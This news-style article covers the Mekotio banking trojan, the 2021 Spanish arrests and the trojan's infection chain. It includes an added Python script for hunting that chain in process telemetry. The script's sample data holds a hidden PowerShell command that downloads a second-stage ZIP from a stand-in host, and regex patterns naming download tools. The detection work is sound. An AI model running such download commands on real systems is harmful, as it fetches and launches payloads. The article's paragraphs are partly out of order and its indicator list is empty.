According to reports, the latest round of attacks particularly targets victims in Brazil, Chile, Mexico, Peru, and Spain. Check Point researchers reported that “One of the main characteristics […] is the modular attack which gives the attackers the ability to change only a small part of the whole in order to avoid detection.”
The development comes after Spanish authorities arrested 16 members of a criminal network in July 2021 in connection with the operation of Mekotio and another banking virus named Grandoreiro as part of a social engineering campaign targeting European financial institutions.
The arrests were made in Ribeira (A Coruña), Madrid, Parla and Móstoles (Madrid), Seseña (Toledo), Villafranca de los Barros (Badajoz), and Aranda de Duero (Burgos) following a year-long investigation codenamed “Aguas Vivas”.
The Mekotio banking trojan’s operators have reappeared with a change in infection flow in order to remain undetected and avoid protection software while undertaking nearly 100 attacks in the last three months.
Computers, phones and documents were seized, and over 1,800 spam emails were reviewed, allowing law enforcement to stop transfer attempts totalling €3.5 million. The actors are reported to have made €276,470 from the campaign, of which €87,000 has been recovered.
The virus, codenamed “Mekotio” and “Grandoreiro,” worked by intercepting transactions on a banking website and diverting funds to accounts controlled by the hackers. In order to facilitate such fraudulent transactions, at least 68 government email accounts were hacked.
“The money was then divided by sending it to different accounts or withdrawing it.”
The Mekotio malware strain infects Windows PCs through emails posing as pending tax receipts that carry either a link to a ZIP file or a ZIP file as an attachment. When the ZIP archive is opened, a batch script runs, which in turn launches a PowerShell script to download a second-stage ZIP file.
This second-stage ZIP contains an AutoHotkey (AHK) interpreter, an AHK script and the Mekotio DLL payload; the AHK script loads the DLL, which harvests passwords for online banking sites.
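The infection flow described above (batch script, then a PowerShell download, then an AutoHotkey interpreter launched from the downloaded archive) is a parent/child process chain that a defender can hunt for in process-creation telemetry. The following Python sketch is an added example, not code from the original article or from Check Point: the event layout (a simplified Sysmon Event ID 1 shape with `pid`, `ppid`, `image`, `cmdline`), the sample events, the file names and the `.invalid` URL are all constructed for illustration.

```python
"""Hunt for the batch -> PowerShell download -> AutoHotkey chain in process events.

Assumption: events are dicts with pid, ppid, image and cmdline fields
(a simplified Sysmon Event ID 1 layout). The sample data is constructed.
"""
import re
from typing import Dict, Iterator, List

# Constructed sample telemetry: one infection chain plus benign noise.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\AppData\Local\Temp\recibo_fiscal.bat"'},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/stage2.zip -OutFile $env:TEMP\s2.zip"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\victim\AppData\Local\Temp\s2\AutoHotkey.exe",
     "cmdline": "AutoHotkey.exe run.ahk"},
    # Benign: an interactive PowerShell with no download and no AHK child.
    {"pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Date"},
    # Benign: a user-installed AutoHotkey macro started from Explorer.
    {"pid": 600, "ppid": 100, "image": r"C:\Program Files\AutoHotkey\AutoHotkey.exe",
     "cmdline": "AutoHotkey.exe macros.ahk"},
]

# Command-line patterns for each stage (tune to your environment).
PS_DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|net\.webclient|"
    r"start-bitstransfer|\bcurl\b|\bwget\b", re.I)
SCRIPT_RE = re.compile(r"\.(bat|cmd)\b", re.I)
AHK_RE = re.compile(r"\.ahk\b", re.I)


def basename(image: str) -> str:
    """Lower-cased file name of an image path, accepting either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_batch_stage(ev: Dict) -> bool:
    return basename(ev["image"]) == "cmd.exe" and bool(SCRIPT_RE.search(ev["cmdline"]))


def is_ps_download_stage(ev: Dict) -> bool:
    return (basename(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and bool(PS_DOWNLOAD_RE.search(ev["cmdline"])))


def is_ahk_stage(ev: Dict) -> bool:
    return basename(ev["image"]).startswith("autohotkey") and bool(AHK_RE.search(ev["cmdline"]))


def ancestors(ev: Dict, by_pid: Dict[int, Dict], limit: int = 32) -> Iterator[Dict]:
    """Yield parent, grandparent, ... stopping on unknown pids, cycles or depth."""
    seen = {ev["pid"]}
    cur = by_pid.get(ev["ppid"])
    while cur is not None and cur["pid"] not in seen and len(seen) < limit:
        yield cur
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])


def find_mekotio_chains(events: List[Dict]) -> List[Dict]:
    """Return one finding per AutoHotkey process whose ancestry contains a
    downloading PowerShell and, above that, a cmd.exe running a batch script.

    Caveat: keyed by pid only, so feed it events from a single host and a
    short window to avoid pid reuse stitching unrelated processes together.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if not is_ahk_stage(ev):
            continue
        ps_pid = batch_pid = None
        for anc in ancestors(ev, by_pid):
            if ps_pid is None and is_ps_download_stage(anc):
                ps_pid = anc["pid"]
            elif ps_pid is not None and is_batch_stage(anc):
                batch_pid = anc["pid"]
                break
        if ps_pid is not None and batch_pid is not None:
            findings.append({"ahk_pid": ev["pid"], "powershell_pid": ps_pid, "batch_pid": batch_pid})
    return findings


if __name__ == "__main__":
    for hit in find_mekotio_chains(SAMPLE_EVENTS):
        print("suspected Mekotio chain:", hit)
```

Only the chain rooted at the batch script is reported; the interactive PowerShell and the user's own AutoHotkey macro are left alone, which is the point of matching on the ordered ancestry rather than on any single process. In production the same logic maps onto an EDR or SIEM query over parent/child relationships, with the stage regexes adjusted to local conventions.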
Finally, Check Point’s Kobi Eisenkraft concluded that “As a result, the arrests put a stop to the Spanish gangs’ activities, but not to the primary cybercrime groups behind Mekotio.” The Mekotio banker represents a very real risk of stealing the usernames and passwords used to access financial institutions.
Indicators of Compromise
Links to first zip